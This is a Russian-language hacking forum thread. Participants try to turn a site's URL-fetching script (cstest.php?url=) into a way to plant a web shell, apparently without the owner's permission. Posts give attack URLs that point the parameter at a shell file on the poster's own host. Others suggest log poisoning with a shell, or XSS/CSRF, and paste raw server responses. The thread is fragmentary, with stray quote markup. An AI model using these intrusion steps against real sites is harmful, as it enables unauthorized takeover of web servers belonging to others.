Есть сайт: https://site.com/cstest.php?url=

Eсли дописать ссылку https://site.com/cstest.php?url=http://site.ru/shell.php - то на сайте выводиться shell с моим сайтом.

Вопрос: можно ли залить Shell на сайт "https://site.com" ?

Попробуй

https://site.com/cstest.php?url=http://site.ru/shell.txt

не прокатило...

вот что выбило:


posting to url: http://site.com/shell.txt
Array (

Code:
=> 200 [body] => [header] => HTTP/1.1 200 OK Date: Mon, 23 Jul 2012 10:50:33 GMT Server: LiteSpeed Accept-Ranges: bytes Connection: close ETag: "3870-500d2bf7-0" Last-Modified: Mon, 23 Jul 2012 10:48:23 GMT Content-Type: text/plain Content-Length: 14448 )


[/QUOTE]
[/CODE]

[/QUOTE]

xxddz said:
Попробуй
https://site.com/cstest.php?url=http://site.ru/shell.txt


Нет, это не поможет, так как судя по словам из первого поста, на сайте скорее всего создается страница, которая содержит iframe со ссылкой на url.


StormAttack said:
не прокатило...
вот что выбило:


Хотя не iframe, скорее всего, а сайт просто пытается скачать и вывести страницу, которая передается в параметре url.

если через cstest.php?url= можно читать локальные файлы, пробуй найти лог-файл и отправить на сервер пакет с шеллом

Chrome~ said:
Нет, это не поможет, так как судя по словам из первого поста, на сайте скорее всего создается страница, которая содержит iframe со ссылкой на url.


это не iframe, это форма с полями URL и FORM Body

человек-паук said:
если через cstest.php?url= можно читать локальные файлы, пробуй найти лог-файл и отправить на сервер пакет с шеллом


локальные файлы не читает


0Array (

Code:
=> 0 [body] => Couldn't resolve host 'whatwedo.php' )


[/QUOTE]
[/CODE]

[/QUOTE]

StormAttack said:
это не iframe, это форма с полями URL и FORM Body


Я понимаю, но страница, которая выводится после отправки формы, может содержать iframe, или же как я написал выше - содержимое скачанного файла.


StormAttack said:
локальные файлы не читает


Тогда все ясно. Скрипт просто обращается к странице url, скачивает ее, и выводит на экран. Это можно использовать максимум для XSS/CSRF атаки, но только при условии, что страница выведется как html документ, а не чистый текст.

Chrome~ said:
Я понимаю, но страница, которая выводится после отправки формы, может содержать iframe, или же как я написал выше - содержимое скачанного файла.
Тогда все ясно. Скрипт просто обращается к странице url, скачивает ее, и выводит на экран. Это можно использовать максимум для XSS/CSRF атаки, но только при условии, что страница выведется как html документ, а не чистый текст.


Понятно, спасибо.

0Array (

Code:
=> 0 [body] => Couldn't resolve host 'whatwedo.php' )

А чего он пытается его отрезолвить как хост?
Запрос покажи.


[/QUOTE]

А чего он пытается его отрезолвить как хост?
Запрос покажи.
[/CODE]

[/QUOTE]